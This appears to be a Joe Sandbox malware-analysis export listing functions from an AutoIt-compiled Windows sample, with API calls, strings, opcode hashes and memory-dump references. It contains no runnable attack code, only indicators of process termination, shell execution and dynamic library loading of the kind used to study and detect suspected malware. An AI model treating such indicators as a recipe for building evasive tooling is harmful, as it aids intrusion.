                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: b4cf20d3c230584b5bdb48f9b4b493fb2fb8bf97a0ad660fc21089dbb185c252
                                                        • Instruction ID: 04de628feb0283686404b8a88eed28aa8b916247e850199edeb1131fcfbdc96b
                                                        • Opcode Fuzzy Hash: b4cf20d3c230584b5bdb48f9b4b493fb2fb8bf97a0ad660fc21089dbb185c252
                                                        • Instruction Fuzzy Hash: 560167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00415BA15C4BA42C7F5A864CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0070EB30
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0070EB46
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0070EB55
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB64
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB6E
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB75
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: effa0d585b5815832055f9afcdf422981422446544216da7a1a67a6c0c1f1d18
                                                        • Instruction ID: 8bf786e4fbad38eb85d5c1aaae50f4a9e83c12f821092a296635f05e7ce339bd
                                                        • Opcode Fuzzy Hash: effa0d585b5815832055f9afcdf422981422446544216da7a1a67a6c0c1f1d18
                                                        • Instruction Fuzzy Hash: DFF030B2140158BBF72257629C0EEEF3A7CEFCAB12F008158F601E1091D7A85A01D7B9
                                                        APIs
                                                        • GetClientRect.USER32(?), ref: 006F7452
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 006F7469
                                                        • GetWindowDC.USER32(?), ref: 006F7475
                                                        • GetPixel.GDI32(00000000,?,?), ref: 006F7484
                                                        • ReleaseDC.USER32(?,00000000), ref: 006F7496
                                                        • GetSysColor.USER32(00000005), ref: 006F74B0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                        • String ID:
                                                        • API String ID: 272304278-0
                                                        • Opcode ID: fbd3ee1c6bcd245d27c4ac3aced401a7c619709c8e667ae21a301206793a46a3
                                                        • Instruction ID: 70c012f3eb9feda3f0e2cf836e6b2e6fd986735cf87b622e8744347676ddf0ae
                                                        • Opcode Fuzzy Hash: fbd3ee1c6bcd245d27c4ac3aced401a7c619709c8e667ae21a301206793a46a3
                                                        • Instruction Fuzzy Hash: C901AD31400219EFEB125F64DC09BFE7BB6FF04312F608060FA15A61A0CB352E51EB14
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0070187F
                                                        • UnloadUserProfile.USERENV(?,?), ref: 0070188B
                                                        • CloseHandle.KERNEL32(?), ref: 00701894
                                                        • CloseHandle.KERNEL32(?), ref: 0070189C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007018A5
                                                        • HeapFree.KERNEL32(00000000), ref: 007018AC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 68cd532bb3385a4dd59abae5c4dc6c46e26f92878b89382704a653cc35a81e49
                                                        • Instruction ID: d3c80adce5e16e9a0322bcfa890d01e0cf7eeb0a00465979aa4b5a77e75e1a66
                                                        • Opcode Fuzzy Hash: 68cd532bb3385a4dd59abae5c4dc6c46e26f92878b89382704a653cc35a81e49
                                                        • Instruction Fuzzy Hash: 44E0E576004105BBEB025FA1ED0C90ABF39FF49B23B10C220F225A1070CB369830EF58
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 006ABEB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: D%w$D%w$D%w$D%wD%w
                                                        • API String ID: 1385522511-1150760593
                                                        • Opcode ID: fc44e074d6858d79c34d03ccb6baf13b49c34a136595c367d8326fd03e8955f2
                                                        • Instruction ID: 171eaaf57f1521ced85febd8390166c38c22deed87f8689b8383841631dd57de
                                                        • Opcode Fuzzy Hash: fc44e074d6858d79c34d03ccb6baf13b49c34a136595c367d8326fd03e8955f2
                                                        • Instruction Fuzzy Hash: 63914C75A00206DFCB14EF58C090AA9B7F2FF5A310B24916DD556AB352D731AD82CF90
                                                        APIs
                                                          • Part of subcall function 006C0242: EnterCriticalSection.KERNEL32(0077070C,00771884,?,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C024D
                                                          • Part of subcall function 006C0242: LeaveCriticalSection.KERNEL32(0077070C,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C028A
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                          • Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9
                                                        • __Init_thread_footer.LIBCMT ref: 00727BFB
                                                          • Part of subcall function 006C01F8: EnterCriticalSection.KERNEL32(0077070C,?,?,006B8747,00772514), ref: 006C0202
                                                          • Part of subcall function 006C01F8: LeaveCriticalSection.KERNEL32(0077070C,?,006B8747,00772514), ref: 006C0235
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                        • String ID: +To$5$G$Variable must be of type 'Object'.
                                                        • API String ID: 535116098-412540982
                                                        • Opcode ID: d28b302ec3ead7467299c29a48a40ec4d3999f172f15415ca0998a80f920fdb4
                                                        • Instruction ID: 40178c9c726e4c8ca4eb994ed0fb51c0f9fa0b2c7f3ec668a1757a06926a7026
                                                        • Opcode Fuzzy Hash: d28b302ec3ead7467299c29a48a40ec4d3999f172f15415ca0998a80f920fdb4
                                                        • Instruction Fuzzy Hash: 17917F70A04219EFCB18EF54E9959BDB7B6FF45300F14805DF8066B292DB39AE81CB61
                                                        APIs
                                                          • Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0070C6EE
                                                        • _wcslen.LIBCMT ref: 0070C735
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0070C79C
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0070C7CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                        • String ID: 0
                                                        • API String ID: 1227352736-4108050209
                                                        • Opcode ID: 08bd2e7b7ffb2824a399eeef6763aeff34d490aa830c458fd21ecca64f38712e
                                                        • Instruction ID: 7820d6a2e646ea6415991fb145ae7a66d5132c83163091dc3ff187af5ab368e8
                                                        • Opcode Fuzzy Hash: 08bd2e7b7ffb2824a399eeef6763aeff34d490aa830c458fd21ecca64f38712e
                                                        • Instruction Fuzzy Hash: ED51BC71604300DBD766EF28C885BAAB7E8AF89310F045B2DF995E21E0DB78DD448F56
                                                        APIs
                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0072AEA3
                                                          • Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625
                                                        • GetProcessId.KERNEL32(00000000), ref: 0072AF38
                                                        • CloseHandle.KERNEL32(00000000), ref: 0072AF67
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                        • String ID: <$@
                                                        • API String ID: 146682121-1426351568
                                                        • Opcode ID: 00081cd583e1022304b28013e75c5420adb977649dd6fb9e01b27092b8f1039d
                                                        • Instruction ID: 60536b7bf995817a494bf74f97e4aa66fab80b24dd19fc2978218c25dd630080
                                                        • Opcode Fuzzy Hash: 00081cd583e1022304b28013e75c5420adb977649dd6fb9e01b27092b8f1039d
                                                        • Instruction Fuzzy Hash: B5716771A00625EFCB14EF54D485A9EBBF1AF09310F04849DE816AB362CB78ED45CFA5
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00707206
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0070723C
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0070724D
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007072CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: abb4d3fb64aeade084168428896fa67e847c3f42cb42d411426c61d702c84819
                                                        • Instruction ID: fba563419474f10ae057220c04f6edb552a2372aafa8174d1ea3a99032f48fe7
                                                        • Opcode Fuzzy Hash: abb4d3fb64aeade084168428896fa67e847c3f42cb42d411426c61d702c84819
                                                        • Instruction Fuzzy Hash: 864151B1A04204EFDB19CF54C884A9A7BF9FF44310F1581A9BD059F24AD7B9ED44DBA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00732F8D
                                                        • LoadLibraryW.KERNEL32(?), ref: 00732F94
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00732FA9
                                                        • DestroyWindow.USER32(?), ref: 00732FB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                        • String ID: SysAnimate32
                                                        • API String ID: 3529120543-1011021900
                                                        • Opcode ID: d127c6c868f57f3102ca3693a6252726ed327103cb409cfc3eb8bbaa6112d67f
                                                        • Instruction ID: d68285b74e5203ae3847372c975ce7955e514ff714c914ad8fac11b654596c25
                                                        • Opcode Fuzzy Hash: d127c6c868f57f3102ca3693a6252726ed327103cb409cfc3eb8bbaa6112d67f
                                                        • Instruction Fuzzy Hash: 9B21FD7220420AEBFB114F64DC80EBB37BDEF59364F104618FA50E21A2C339DC829760
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006C4D1E,006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002), ref: 006C4D8D
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006C4DA0
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,006C4D1E,006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000), ref: 006C4DC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: cdaf38c784d9dbf3f3d99b4dedd7d166ef8aaf7eefbae26c2f2cc7a5abf53dac
                                                        • Instruction ID: 83a1d1d50c2a522f2ce0be0a7e5ecd7ba251543857385f302e4f9411459d12f7
                                                        • Opcode Fuzzy Hash: cdaf38c784d9dbf3f3d99b4dedd7d166ef8aaf7eefbae26c2f2cc7a5abf53dac
                                                        • Instruction Fuzzy Hash: 03F04475540208BBEB129F90DC49FEDBBB5EF44752F044198F906A2250DF786940DBD5
                                                        APIs
                                                        • LoadLibraryA.KERNEL32 ref: 006FD3AD
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006FD3BF
                                                        • FreeLibrary.KERNEL32(00000000), ref: 006FD3E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                        • API String ID: 145871493-2590602151
                                                        • Opcode ID: d79a3c93b5489224e742256386cb07d48cf16124cba98667bf6ed2a273941607
                                                        • Instruction ID: a913967dcc7a8e19b7a329be56d54fff654d5304aefd151cabd2ac70e356b050
                                                        • Opcode Fuzzy Hash: d79a3c93b5489224e742256386cb07d48cf16124cba98667bf6ed2a273941607
                                                        • Instruction Fuzzy Hash: B9F055B640563C9BFB3227108C089B93213AF12B02B54C098FB02F2218DB24EE80A7C7
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E9C
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006A4EAE
                                                        • FreeLibrary.KERNEL32(00000000,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EC0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 145871493-3689287502
                                                        • Opcode ID: 0c98da27c944d55f8b603fd7ea61367df0014a760eee4bb204b078f80b20f182
                                                        • Instruction ID: 6b1e6d01cc86676f33fbe6fa705ce319ab007768e2a098b542b079bc4f2b7f83
                                                        • Opcode Fuzzy Hash: 0c98da27c944d55f8b603fd7ea61367df0014a760eee4bb204b078f80b20f182
                                                        • Instruction Fuzzy Hash: EFE08676A016225BA22327256C18A9B6555BFC2B63B054115FC01F2201DFA8CD0196E4
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E62
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006A4E74
                                                        • FreeLibrary.KERNEL32(00000000,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E87
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 145871493-1355242751
                                                        • Opcode ID: 5494281018859f9330373ac347df10c1954f1ae30d79204497ab929ae583ebc9
                                                        • Instruction ID: 5a6d64405b41d679a75cc6029d02460d2e030c3039db735b29123e927845af2f
                                                        • Opcode Fuzzy Hash: 5494281018859f9330373ac347df10c1954f1ae30d79204497ab929ae583ebc9
                                                        • Instruction Fuzzy Hash: 4AD0C2765026215766232B247C08DCB6A1ABFC2B123054111B801F2211CFA8CD01DAD4
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 0072A427
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0072A435
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0072A468
                                                        • CloseHandle.KERNEL32(?), ref: 0072A63D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                        • String ID:
                                                        • API String ID: 3488606520-0
                                                        • Opcode ID: be7cf2d1584a7ebc6fe9ad7b5ce7fb2daf524d3c09e2761a8d7a181fc459f984
                                                        • Instruction ID: a862be1d36c622c0ab4b2b6cd439ffda68f1790071efa43b77eba30b483644f5
                                                        • Opcode Fuzzy Hash: be7cf2d1584a7ebc6fe9ad7b5ce7fb2daf524d3c09e2761a8d7a181fc459f984
                                                        • Instruction Fuzzy Hash: 6AA1B171604300AFE760EF24D886F2AB7E6AF84714F14881DF55A9B2D2D774EC41CB96
                                                        APIs
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00743700), ref: 006DBB91
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0077121C,000000FF,00000000,0000003F,00000000,?,?), ref: 006DBC09
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00771270,000000FF,?,0000003F,00000000,?), ref: 006DBC36
                                                        • _free.LIBCMT ref: 006DBB7F
                                                          • Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
                                                          • Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0
                                                        • _free.LIBCMT ref: 006DBD4B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                        • String ID:
                                                        • API String ID: 1286116820-0
                                                        • Opcode ID: e56b1a01529acecfff5bd1b7d9b79127339443bd063a29736ff4fd03bd091a91
                                                        • Instruction ID: b4577477c33abf5e2e906f2703304a461f3e604bf567b8219e9ce02c5a864dc0
                                                        • Opcode Fuzzy Hash: e56b1a01529acecfff5bd1b7d9b79127339443bd063a29736ff4fd03bd091a91
                                                        • Instruction Fuzzy Hash: 35510471D00209EBCB10EF698C819AEB7BAFF44350B12526FE454D7399EB709E409B58
                                                        APIs
                                                          • Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0070CF22,?), ref: 0070DDFD
